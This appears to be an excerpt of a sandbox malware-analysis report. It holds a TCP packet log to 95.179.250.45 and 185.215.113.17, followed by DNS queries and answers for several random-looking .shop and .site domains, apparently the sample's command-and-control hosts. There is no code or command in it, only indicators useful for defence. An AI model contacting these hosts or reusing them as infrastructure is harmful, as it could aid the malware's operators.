Sep 27, 2024 04:21:19.183881044 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183911085 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183917999 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183973074 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.184014082 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.184048891 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.184058905 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.184097052 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.184133053 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.184163094 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.184179068 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.184217930 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.184267998 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.188080072 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:19.188404083 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188447952 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188463926 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.188474894 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188486099 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.188502073 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188510895 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188532114 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.188549995 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188555956 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.188560963 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188599110 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188601017 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.188608885 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188657999 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188667059 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188674927 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188684940 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188710928 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188719988 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188801050 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188810110 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188817978 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188822031 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188857079 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188864946 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188899994 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188909054 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188952923 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.188962936 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189007998 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189009905 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.189017057 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189030886 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189040899 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189060926 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189062119 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.189073086 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189079046 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.189084053 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189109087 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.189125061 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.189156055 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189167023 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189174891 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189192057 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189201117 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189209938 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.189217091 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189225912 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189289093 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189305067 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189316988 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189325094 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189347982 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189383030 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189430952 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189440012 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189460993 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189471006 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189516068 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189532042 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189539909 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189548016 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189563036 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189572096 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189600945 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189651012 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.189698935 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.192997932 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:19.193238974 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193286896 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193295956 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193335056 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193344116 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193377018 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193384886 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193393946 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193437099 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193445921 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193480015 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193489075 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193514109 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193531990 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193567991 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193795919 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.193837881 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193850994 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193871021 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.193876982 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193907022 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193914890 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193964958 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193974018 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.193998098 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194056988 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194073915 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194133997 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194183111 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194197893 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194206953 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194216013 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194706917 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194715977 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194725990 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194734097 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194741964 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194750071 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194757938 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194766998 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194775105 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194782972 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194791079 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194799900 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194808006 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194816113 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194823980 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194832087 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194840908 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194850922 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194859028 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194865942 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194875002 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194881916 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194897890 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194906950 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194915056 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194924116 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194931984 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194940090 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194947958 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194956064 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194964886 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194972992 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194989920 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.194998026 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.195005894 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.195014000 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.195029020 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.195036888 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.195044041 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.195344925 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.195431948 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.198723078 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198734045 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198769093 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198776960 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198786020 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198801041 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198811054 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198848009 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198857069 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198940039 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198947906 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198956966 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198965073 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198982000 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198991060 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.198998928 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199007988 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199018002 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199043989 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199052095 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199115992 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199124098 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199132919 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199150085 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199157953 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199167013 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199177027 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199194908 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199203968 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199256897 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199265003 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199273109 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199282885 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199292898 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199352026 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199359894 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199368000 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199376106 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199389935 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199405909 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199415922 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199430943 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199440002 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199471951 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199480057 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199532986 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199541092 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199557066 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199565887 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199573040 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199584007 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199661016 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199670076 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.199769020 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200061083 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.200122118 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.200191975 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200202942 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200249910 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200258017 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200265884 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200282097 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200289965 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200351954 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200360060 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200375080 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200382948 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200422049 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200432062 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200462103 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200470924 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200517893 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200525999 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200546026 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200579882 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200589895 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200644016 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200655937 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200664043 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200669050 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200726986 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200737953 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200746059 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200756073 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200779915 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200789928 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200844049 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200851917 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200860977 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200870991 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200886965 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200987101 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.200995922 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201004028 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201013088 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201028109 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201035976 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201044083 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201051950 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201108932 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201117992 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201126099 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201134920 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201150894 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201159000 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201167107 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201195955 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201204062 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201211929 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201231956 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.201406956 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.201477051 CEST	49714	26212	192.168.2.5	95.179.250.45

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 04:21:33.946362019 CEST	192.168.2.5	1.1.1.1	0x2668	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:39.568380117 CEST	192.168.2.5	1.1.1.1	0x7a02	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:40.882673979 CEST	192.168.2.5	1.1.1.1	0xa8bc	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:41.811165094 CEST	192.168.2.5	1.1.1.1	0xe48f	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:42.843406916 CEST	192.168.2.5	1.1.1.1	0x82e9	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:43.849666119 CEST	192.168.2.5	1.1.1.1	0x442d	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:46.017817974 CEST	192.168.2.5	1.1.1.1	0xbad2	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:47.003766060 CEST	192.168.2.5	1.1.1.1	0x58b0	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:48.022681952 CEST	192.168.2.5	1.1.1.1	0x3538	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:48.961607933 CEST	192.168.2.5	1.1.1.1	0xa8ad	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:50.293917894 CEST	192.168.2.5	1.1.1.1	0xe0a	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:00.413964987 CEST	192.168.2.5	1.1.1.1	0x1882	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:00.414109945 CEST	192.168.2.5	1.1.1.1	0xd137	Standard query (0)	youtube.com	65	IN (0x0001)	false
Sep 27, 2024 04:22:01.399667978 CEST	192.168.2.5	1.1.1.1	0xd529	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:01.399776936 CEST	192.168.2.5	1.1.1.1	0xfe67	Standard query (0)	www.youtube.com	65	IN (0x0001)	false
Sep 27, 2024 04:22:04.900928020 CEST	192.168.2.5	1.1.1.1	0xdbfa	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:04.901010036 CEST	192.168.2.5	1.1.1.1	0xfd2e	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 27, 2024 04:22:16.620887995 CEST	192.168.2.5	1.1.1.1	0xfc51	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:22:33.635339975 CEST	192.168.2.5	1.1.1.1	0x1879	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 04:21:33.953068018 CEST	1.1.1.1	192.168.2.5	0x2668	No error (0)	google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:39.579673052 CEST	1.1.1.1	192.168.2.5	0x7a02	No error (0)	drawzhotdog.shop		172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:39.579673052 CEST	1.1.1.1	192.168.2.5	0x7a02	No error (0)	drawzhotdog.shop		104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:40.894968033 CEST	1.1.1.1	192.168.2.5	0xa8bc	No error (0)	gutterydhowi.shop		104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:40.894968033 CEST	1.1.1.1	192.168.2.5	0xa8bc	No error (0)	gutterydhowi.shop		172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:41.823556900 CEST	1.1.1.1	192.168.2.5	0xe48f	No error (0)	ghostreedmnu.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:41.823556900 CEST	1.1.1.1	192.168.2.5	0xe48f	No error (0)	ghostreedmnu.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:42.856389999 CEST	1.1.1.1	192.168.2.5	0x82e9	No error (0)	offensivedzvju.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:42.856389999 CEST	1.1.1.1	192.168.2.5	0x82e9	No error (0)	offensivedzvju.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:43.861804962 CEST	1.1.1.1	192.168.2.5	0x442d	No error (0)	vozmeatillu.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 04:21:43.861804962 CEST	1.1.1.1	192.168.2.5	0x442d	No error (0)	vozmeatillu.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
